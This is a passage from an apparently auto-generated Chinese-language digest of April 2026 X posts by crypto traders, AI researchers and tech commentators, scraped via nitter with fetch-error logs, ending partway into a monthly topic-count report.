Tian(0 条)\n\n---\n\n### ⚠️ @Bitking_ — BTCKing(获取失败)\n\n- 错误: URLError: \n\n### ✅ @CryptoCred — Credible Crypto(7 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n**[2026-04-11T14:05:43+00:00]**\n> Discretionary traders should think carefully about instrument selection As in spot vs spot margin vs perps vs options and combinations therein The obvious components are cost, liquidity, and capital …\n[原文链接](https://nitter.net/CryptoCred/status/2042967332952101173#m)\n\n**[2026-04-08T06:19:28+00:00]**\n> Crypto analysis in 2024: The dog has a hat Crypto analysis in 2026: Strait of Hormuz, auto-translate from Farsi, tracking military movements via OSINT, oil futures backwardation\n[原文链接](https://nitter.net/CryptoCred/status/2041762832744694217#m)\n\n**[2026-04-07T08:45:41+00:00]**\n> New traders get told that they have to have specific 'setups' So they spend all day back-testing some random price pattern and shove a couple of indicators in there for good measure, and then fire ri…\n[原文链接](https://nitter.net/CryptoCred/status/2041437242799902933#m)\n\n**[2026-04-04T10:17:12+00:00]**\n> TechnicalRoundup is back. DonAlt and I have been trading crypto for 9+ years and have been doing some version of this show on and off for around 5 years (mostly off, sorry). It's fun and different: l…\n[原文链接](https://nitter.net/CryptoCred/status/2040373108901568631#m)\n\n**[2026-04-03T09:18:21+00:00]**\n> An obvious but underappreciated fact: Crypto traders' high volatility tolerance can be a great source of edge It doesn't feel like it when you're bagholding a shitcoin that's drifting to zero or trad…\n[原文链接](https://nitter.net/CryptoCred/status/2039995911384752540#m)\n\n**[2026-04-02T20:03:46+00:00]**\n> Wtf\n[原文链接](https://nitter.net/CryptoCred/status/2039795951095714268#m)\n\n---\n\n### ✅ @AltcoinBuzz — Altcoin Buzz(0 条)\n\n---\n\n### ✅ @TradingGods — Trading Gods(0 条)\n\n---\n\n### ✅ @Warrior_Trading — Warrior Trading(0 条)\n\n---\n\n### ✅ @ProfTrading — Profitable Trading(0 条)\n\n---\n\n### ✅ @SatoshiBun — Satoshi(19 条)\n\n**[2026-04-25T15:26:45+00:00]**\n> RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look mor…\n[原文链接](https://nitter.net/images_i_love3/status/2048061157685010444#m)\n\n**[2026-04-24T18:45:53+00:00]**\n> RT by @satoshibun: Baby’s first con\n[原文链接](https://nitter.net/Aaron_Margolin/status/2047748882952778044#m)\n\n**[2026-04-24T17:05:22+00:00]**\n> RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!\n[原文链接](https://nitter.net/tokidoki/status/2047723587528782152#m)\n\n**[2026-04-24T16:16:22+00:00]**\n> RT by @satoshibun: Good morning! Rise and shine, gamers!\n[原文链接](https://nitter.net/shopculturefly/status/2047711254379393160#m)\n\n**[2026-04-24T11:40:30+00:00]**\n> Im genuinely this Close to killing myself rn & this Shit happens like Okay\n[原文链接](https://nitter.net/satoshibun/status/2047641832624893993#m)\n\n**[2026-04-24T11:06:42+00:00]**\n> RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing. I just don't get it\n[原文链接](https://nitter.net/DaCapTainXD/status/2047633324676440561#m)\n\n**[2026-04-24T09:21:13+00:00]**\n> RT by @satoshibun: 😾\n[原文链接](https://nitter.net/aaa___kanato/status/2047606779677376714#m)\n\n**[2026-04-24T08:00:10+00:00]**\n> RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️ ⠀⠀⠀⠀⠀⠀⠀『#文字化化』 ⠀「不思議の国のアリス」テーマ ⠀グラフアート新商品発売決定! ♠️━━━━━━━━━━━━━♥️ 📅5/23~6/5 📍eeo Store 池袋本店 🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&ut…\n[原文链接](https://nitter.net/eeo_store/status/2047586383519531500#m)\n\n**[2026-04-23T18:56:53+00:00]**\n> RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester\n[原文链接](https://nitter.net/breadstickz1/status/2047389262253855041#m)\n\n**[2026-04-23T14:42:44+00:00]**\n> RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹\n[原文链接](https://nitter.net/cuckuke/status/2047325302771061148#m)\n\n**[2026-04-22T02:03:48+00:00]**\n> RT by @satoshibun: they're about to start making out\n[原文链接](https://nitter.net/savanaclavv/status/2046771924064186549#m)\n\n**[2026-04-18T01:18:33+00:00]**\n> RT by @satoshibun: CATER DIAMOND YOU ARE NOT SAFE AROUND ME\n[原文链接](https://nitter.net/jankacest/status/2045310986412781730#m)\n\n**[2026-04-17T19:29:44+00:00]**\n> RT by @satoshibun: 🤤\n[原文链接](https://nitter.net/jankacest/status/2045223202381508777#m)\n\n**[2026-04-07T04:52:37+00:00]**\n> RT by @satoshibun: It really bugs me\n[原文链接](https://nitter.net/XxHerobrineJrxX/status/2041378590948986948#m)\n\n**[2026-04-05T23:35:20+00:00]**\n> SATOSHI OH MY HEART\n[原文链接](https://nitter.net/satoshibun/status/2040936354708631955#m)\n\n**[2026-04-05T01:17:07+00:00]**\n> RT by @satoshibun: asTRO and meisTRO— #Dandysworld #Dollysfactory\n[原文链接](https://nitter.net/SnipeCap34/status/2040599580002435292#m)\n\n**[2026-04-04T16:08:28+00:00]**\n> RT by @satoshibun: 📢<ぴえん猫ぬいぐるみ 予約開始🥺 アニメ『NEEDY GIRL OVERDOSE』より ”ぴえん猫”がぬいぐるみとなって登場! 色んな場所へぜひ一緒におでかけください🥺 🎀ご予約はこちら https://online.aniplex.co.jp/itemDInljwhS.html\n[原文链接](https://nitter.net/aniplex_plus/status/2040461508497596862#m)\n\n**[2026-04-04T12:07:57+00:00]**\n> RT by @satoshibun: 蔓沢つた子個展 『Vine Garden』の開催、ご来場、誠にありがとうございました! 終わるのが本当に本当に寂しかったです😭 また素敵な機会をいただけるように漫画を描き続けていきたいと思います🌱 キービジュ アフターを添えて🌸\n[原文链接](https://nitter.net/tsutako25/status/2040400983713550680#m)\n\n**[2026-04-03T14:55:06+00:00]**\n> RT by @satoshibun: I love when you can see the influence from Free! (Makoharu & Sourin) in BL\n[原文链接](https://nitter.net/sskslov/status/2040080657175736513#m)\n\n---\n\n### ⚠️ @直播带逛Tommy — Tommy(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @AndrewYNg — Andrew Ng(5 条)\n\n**[2026-04-15T16:16:38+00:00]**\n> New course: Spec-Driven Development with Coding Agents, built in partnership with @jetbrains, and taught by @paulweveritt. Vibe coding is fast, but often produces code that doesn't match what you ask…\n[原文链接](https://nitter.net/AndrewYNg/status/2044449830605582629#m)\n\n**[2026-04-14T16:22:22+00:00]**\n> I'm excited about voice as a UI layer for existing visual applications — where speech and screen update together. This goes well beyond voice-only use cases like call center automation. The barrier h…\n[原文链接](https://nitter.net/AndrewYNg/status/2044088884989177991#m)\n\n**[2026-04-13T17:24:23+00:00]**\n> As AI agents accelerate coding, what is the future of software engineering? Some trends are clear, such as the Product Management Bottleneck, referring to the idea that we are more constrained by dec…\n[原文链接](https://nitter.net/AndrewYNg/status/2043742105852621052#m)\n\n**[2026-04-09T17:11:58+00:00]**\n> New course: Efficient Inference with SGLang: Text and Image Generation, built in partnership with LMSys @lmsysorg and RadixArk @radixark, and taught by Richard Chen @richardczl, a Member of Technical…\n[原文链接](https://nitter.net/AndrewYNg/status/2042289428702642588#m)\n\n**[2026-03-31T18:45:23+00:00]**\n> The anti-AI coalition continues to maneuver to find arguments to slow down AI progress. If someone has a sincere concern about a specific effect of AI, for instance that it may lead to human extincti…\n[原文链接](https://nitter.net/AndrewYNg/status/2039051446084153834#m)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(19 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://nitter.net/nomadicai/status/2046635685206208533#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://nitter.net/ThomasOrTK/status/2046344875994739028#m)\n\n**[2026-04-15T20:13:12+00:00]**\n> It was a delight to serve on the selection committee with an awesome group of committee members. We had lots of great submissions to evaluate and excellent discussions during our selection process. Y…\n[原文链接](https://nitter.net/JeffDean/status/2044509365164773818#m)\n\n**[2026-04-15T16:13:28+00:00]**\n> R to @JeffDean: In case it's not clear, you can click on the picture in the first image to learn more about Ricardo and the award: Twitter swallowed my actual link text to https://awards.acm.org/abou…\n[原文链接](https://nitter.net/JeffDean/status/2044449033490760085#m)\n\n**[2026-04-15T16:12:19+00:00]**\n> Delighted to see that Ricardo Baeza-Yates (@PolarBearby) is this year's winner of the @TheOfficialACM Luiz Barroso Award (an award named in honor of my longtime Google colleague). Ricardo is widely r…\n[原文链接](https://nitter.net/JeffDean/status/2044448743811129716#m)\n\n**[2026-04-15T16:07:45+00:00]**\n> RT by @JeffDean: Introducing Gemini 3.1 Flash TTS 🗣️, our latest text to speech model with scene direction, speaker level specificity, audio tags, more natural + expressive voices, and support for 70…\n[原文链接](https://nitter.net/OfficialLoganK/status/2044447596010435054#m)\n\n**[2026-04-14T15:06:50+00:00]**\n> RT by @JeffDean: We’re rolling out an upgrade designed to help robots reason about the physical world. 🤖 Gemini Robotics-ER 1.6 has significantly better visual and spatial understanding in order to p…\n[原文链接](https://nitter.net/GoogleDeepMind/status/2044069878781390929#m)\n\n**[2026-04-12T23:52:16+00:00]**\n> RT by @JeffDean: Artemis II astronaut Victor Glover received a hero's welcome from his neighbors! 🇺🇸\n[原文链接](https://nitter.net/OwenSparks/status/2043477332438958253#m)\n\n**[2026-04-11T00:29:48+00:00]**\n> RT by @JeffDean: Yet another inspiration to women in STEM. Christina Koch is her name🌑\n[原文链接](https://nitter.net/Ms_Dhaey/status/2042762001873502676#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(9 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n**[2026-04-13T18:05:21+00:00]**\n> Just like us at @thinkymachines, @luke_drago_ @LRudL_ care a lot about amplifying humans, not replacing them. They're joining us to build towards that future!\n[原文链接](https://nitter.net/soumithchintala/status/2043752413085966574#m)\n\n**[2026-04-13T05:30:31+00:00]**\n> RT by @soumithchintala: $200/month is enough to buy an H100 GPU for 6 hours every workday\n[原文链接](https://nitter.net/ekzhang1/status/2043562453452128359#m)\n\n**[2026-04-11T03:17:43+00:00]**\n> RT by @soumithchintala: OpenAI is nothing without its people https://geohot.github.io//blog/jekyll/update/2026/04/11/openai-people.html\n[原文链接](https://nitter.net/geohotarchive/status/2042804258584580211#m)\n\n**[2026-04-09T19:53:32+00:00]**\n> RT by @soumithchintala: We’ve redesigned our docs with easy access to SDK reference, tutorials, support, and our newly updated cookbook---v0.3.0! Whether you’re writing your first training loop in Ti…\n[原文链接](https://nitter.net/tinkerapi/status/2042330088130441337#m)\n\n**[2026-04-03T01:39:41+00:00]**\n> RT by @soumithchintala: This work from @voooooogel was pretty ground-breaking: https://vgel.me/posts/representation-engineering/\n[原文链接](https://nitter.net/jeremyphoward/status/2039880485036544422#m)\n\n---\n\n### ⚠️ @MikeAI — Michael(获取失败)\n\n- 错误: URLError: \n\n### ✅ @Ronald_vanLoon — Ronald van Loon(20 条)\n\n**[2026-04-27T13:11:07+00:00]**\n> Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intelligent systems around th…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is hybrid. → proprieta…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m)\n\n**[2026-04-27T13:00:19+00:00]**\n> R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestration → secure executi…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m)\n\n**[2026-04-27T13:00:18+00:00]**\n> Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one level up, where AI b…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m)\n\n**[2026-04-27T12:50:08+00:00]**\n> Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m)\n\n**[2026-04-27T12:18:17+00:00]**\n> AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m)\n\n**[2026-04-27T11:20:17+00:00]**\n> Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m)\n\n**[2026-04-27T10:56:01+00:00]**\n> You’re about to feel the #AI money squeeze by Hayden Field @verge Learn more: https://bit.ly/3QwH0fu #ArtificialIntelligence #MachineLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048717799531397534#m)\n\n**[2026-04-27T10:50:49+00:00]**\n> Shape-Shifting All-Terrain #Robot Combines Legs, Wheels, and Aerial #Drone Power by @XueJia24682 #Robotics #EmergingTech #Technology #Innovation\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048716491537650168#m)\n\n**[2026-04-27T10:18:11+00:00]**\n> Pizza Goes Underwater: Domino’s UK Trials Submarine Delivery by @IntEngineering #Innovation #EmergingTech #Tech #Technology #TechForGood\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048708277739876755#m)\n\n**[2026-04-27T09:43:13+00:00]**\n> Tiny Pacemaker, Big Impact: A Breakthrough in Cardiac Care by @pascal_bornet #HealthTech #Innovation #EmergingTech #TechForGood #Tech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048699478094315671#m)\n\n**[2026-04-27T09:19:05+00:00]**\n> This Smart Trash Can Tracks and Catches Thrown Garbage Automatically by @IamKyros69 #EmergingTech #Innovation #TechForGood #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048693406138851388#m)\n\n**[2026-04-27T08:45:03+00:00]**\n> Is it time to worry about compute scarcity? by @antgrasso #ArtificialIntelligence #IT #Tech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048684842036978024#m)\n\n**[2026-04-27T08:27:08+00:00]**\n> Real-Life Beetle Bot: Six-Legged Walking #Robot in Action via @ZappyZappy7 #Robotics #MachineLearning #ArtificialIntelligence #ML #MI\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048680331864100997#m)\n\n**[2026-04-23T08:27:04+00:00]**\n> RT by @Ronald_vanLoon: Rapid-Deploy Foldable Solar Panels Deliver Instant Off-Grid Power by @amazingthings_ #Sustainability #RenewableEnergy #CleanEnergy\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047230765193207816#m)\n\n**[2026-04-23T07:48:01+00:00]**\n> RT by @Ronald_vanLoon: #AI-generated #Sensors open new paths for early cancer detection by Anne Trafton @MIT Learn more: https://bit.ly/4pvlBPL #MedTech #Healthcare #HealthTech #Tech #TechForGood\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047220936902861168#m)\n\n**[2026-04-23T07:27:06+00:00]**\n> RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom by @rivr_tech #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m)\n\n**[2026-04-23T06:57:05+00:00]**\n> RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions by @IntEngineering #Robotics #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m)\n\n**[2026-04-23T06:23:14+00:00]**\n> RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour by @AadityaAnand_11 #Robotics #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m)\n\n---\n\n### ✅ @erikbryn — Erik Brynjolfsson(20 条)\n\n**[2026-04-25T03:06:05+00:00]**\n> Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. Here are some of his insights from his visit to my Lab. @FutureJurvetson @Stanford @DigEconLab\n[原文链接](https://nitter.net/erikbryn/status/2047874760542200042#m)\n\n**[2026-04-24T23:32:43+00:00]**\n> RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional e…\n[原文链接](https://nitter.net/RonnieChatterji/status/2047821064437424288#m)\n\n**[2026-04-23T18:14:10+00:00]**\n> RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global econ…\n[原文链接](https://nitter.net/DigEconLab/status/2047378514240999569#m)\n\n**[2026-04-22T01:22:04+00:00]**\n> RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea! Your optimistic take on the value that humans will continue to deliver was so refreshing.\n[原文链接](https://nitter.net/TejuAdeyinka/status/2046761422148018260#m)\n\n**[2026-04-21T21:13:05+00:00]**\n> RT by @erikbryn: How do AI agents influence knowledge work? @SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three p…\n[原文链接](https://nitter.net/DigEconLab/status/2046698761221783753#m)\n\n**[2026-04-21T17:10:57+00:00]**\n> RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323 class at @Stanford today. Questions?\n[原文链接](https://nitter.net/saranormous/status/2046637828025835983#m)\n\n**[2026-04-20T15:07:11+00:00]**\n> Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others.…\n[原文链接](https://nitter.net/erikbryn/status/2046244291945927102#m)\n\n**[2026-04-18T19:33:41+00:00]**\n> R to @erikbryn: Here's the course: https://www.masterclass.com/classes/revolutionize-your-workflows-with-ai\n[原文链接](https://nitter.net/erikbryn/status/2045586582879764872#m)\n\n**[2026-04-18T19:33:19+00:00]**\n> AI should have been named IA. Millions more people would have embraced it to boost their everyday performance. It's something I discuss in my new @MasterClass\n[原文链接](https://nitter.net/erikbryn/status/2045586493494989066#m)\n\n**[2026-04-17T19:30:17+00:00]**\n> RT by @erikbryn: The Universal High Income Power Map ft. @elonmusk, @AndrewYang, @erikbryn\n[原文链接](https://nitter.net/ADINresearch/status/2045223340420272212#m)\n\n**[2026-04-17T18:03:04+00:00]**\n> RT by @erikbryn: AI assistants don’t just answer questions anymore; they jump in with suggestions. Does this generally improve worker's quality of output or hurt it? How do these effects vary by expe…\n[原文链接](https://nitter.net/StanfordHAI/status/2045201392739205391#m)\n\n**[2026-04-17T00:58:55+00:00]**\n> AI can power small teams to boost output, write @saraheneedleman in @BusinessInsider. https://africa.businessinsider.com/careers/snaps-layoffs-highlight-growing-work-trend-ai-powered-tiny-teams/xw8st…\n[原文链接](https://nitter.net/erikbryn/status/2044943654486462558#m)\n\n**[2026-04-16T16:34:38+00:00]**\n> R to @erikbryn: Here's the course: https://www.masterclass.com/classes/revolutionize-your-workflows-with-ai\n[原文链接](https://nitter.net/erikbryn/status/2044816749720432652#m)\n\n**[2026-04-16T16:33:12+00:00]**\n> Most people are only getting a fraction of the value they could be getting from AI tools. It's a huge \"capabilities overhang\". Along with the amazing Cat Goetze and Parth Patil, I've created a @Maste…\n[原文链接](https://nitter.net/erikbryn/status/2044816389521969353#m)\n\n**[2026-04-16T00:16:09+00:00]**\n> RT by @erikbryn: What a pleasant surprise to see the former Prime Minister of #UK (@RishiSunak) post about the @Stanford paper on Enterprise #AI I co-authored. 💡 @erikbryn @elisacmpereira1 @DigEconLa…\n[原文链接](https://nitter.net/AGraylin/status/2044570504577855699#m)\n\n**[2026-04-15T20:31:16+00:00]**\n> RT by @erikbryn: Very excited to share that our project was selected as a @LaudeInstitute Moonshots seed grant winner on workforce upskilling @tatsu_hashimoto @erikbryn This is something I think abou…\n[原文链接](https://nitter.net/Diyi_Yang/status/2044513911484125496#m)\n\n**[2026-04-15T18:44:08+00:00]**\n> RT by @erikbryn: “Collaborative Intelligence for the Future of Work” from Lab Director @erikbryn, @tatsu_hashimoto and @Diyi_Yang has an ambitious plan for policymakers, workers and institutions to g…\n[原文链接](https://nitter.net/DigEconLab/status/2044486951290716635#m)\n\n**[2026-04-15T17:30:36+00:00]**\n> RT by @erikbryn: Workforce Reskilling track: Research that helps people adapt to labor market shifts through retraining, upskilling, and lifelong learning. 🤖Collaborative Intelligence for the Future …\n[原文链接](https://nitter.net/LaudeInstitute/status/2044468446696731011#m)\n\n**[2026-04-13T21:09:34+00:00]**\n> See data on the net flow of AI authors and inventors and thousands of other insights in the #AIIndex2026, released today.\n[原文链接](https://nitter.net/erikbryn/status/2043798774699683995#m)\n\n**[2026-04-13T16:36:20+00:00]**\n> RT by @erikbryn: Dean Pomerleau was working on self-driving cars decades before Teslas and Waymos hit the streets. @tommmitchell dives into the surprising early history of autonomous driving in the l…\n[原文链接](https://nitter.net/DigEconLab/status/2043730014798225488#m)\n\n---\n\n### ✅ @liuliu — 刘进(14 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n**[2026-04-17T18:37:25+00:00]**\n> You cannot believe how much intrinsic knowledge GPT-5.4 has about building GPU compute kernels. I honestly think this will materially impact NVIDIA's lead in software.\n[原文链接](https://nitter.net/liuliu/status/2045210034813186142#m)\n\n**[2026-04-16T19:47:19+00:00]**\n> M4 is faster (since a few days ago): https://engineering.drawthings.ai/p/making-apple-neural-engine-work-in\n[原文链接](https://nitter.net/liuliu/status/2044865239532163122#m)\n\n**[2026-04-16T17:17:18+00:00]**\n> R to @liuliu: Image\n[原文链接](https://nitter.net/liuliu/status/2044827486220111890#m)\n\n**[2026-04-16T17:17:18+00:00]**\n> Hold my beer:\n[原文链接](https://nitter.net/liuliu/status/2044827484823412831#m)\n\n**[2026-04-14T17:53:21+00:00]**\n> Apparently, this continues for M5 users too.\n[原文链接](https://nitter.net/liuliu/status/2044111782839759304#m)\n\n**[2026-04-11T18:58:41+00:00]**\n> Download to double your FLOPs on your M4s.\n[原文链接](https://nitter.net/liuliu/status/2043041062265196703#m)\n\n**[2026-04-07T18:04:24+00:00]**\n> LLM not only made it harder to write, also made it harder to read. Once you knew it is done by a LLM for an opinion piece, you know it is uninteresting and you would better off to just ask LLM direct…\n[原文链接](https://nitter.net/liuliu/status/2041577848620908756#m)\n\n**[2026-04-06T03:36:40+00:00]**\n> Show some love to base M4.\n[原文链接](https://nitter.net/liuliu/status/2040997087320662033#m)\n\n**[2026-04-03T20:21:06+00:00]**\n> When getting more taste of training with quantized kernels, you would appreciate more of FP8 and skeptical more to FP4.\n[原文链接](https://nitter.net/liuliu/status/2040162699313852876#m)\n\n**[2026-04-02T00:15:09+00:00]**\n> Day 5: https://releases.drawthings.ai/p/introducing-mediagenerationkit-hybrid\n[原文链接](https://nitter.net/liuliu/status/2039496823396769803#m)\n\n**[2026-04-01T00:53:47+00:00]**\n> Day 4: https://releases.drawthings.ai/p/metal-quantized-attention-pulling\n[原文链接](https://nitter.net/liuliu/status/2039144158917702114#m)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @王川 — 王川(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @老胡 — 老胡(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @比特币超级玩家 — 超级玩家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T13:42:08.196749+00:00\n**分析账号**: 33个 | **活跃账号**: 18个 | **推文总量**: 302条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:208 条\n- **模型能力**:55 条\n- **交易与市场**:15 条\n- **算力与芯片**:13 条\n- **投融资与并购**:11 条\n\n## 三、活跃账号 Top10\n\n- @sama: 20 条\n- @Ronald_vanLoon: 20 条\n- @paulg: 20 条\n- @DavidSacks: 20 条\n- @ylecun: 20 条\n- @eladgil: 20 条\n- @erikbryn: 20 条\n- @JeffDean: 19 条\n- @GaryMarcus: 19 条\n- @HarryStebbings: 19 条\n\n## 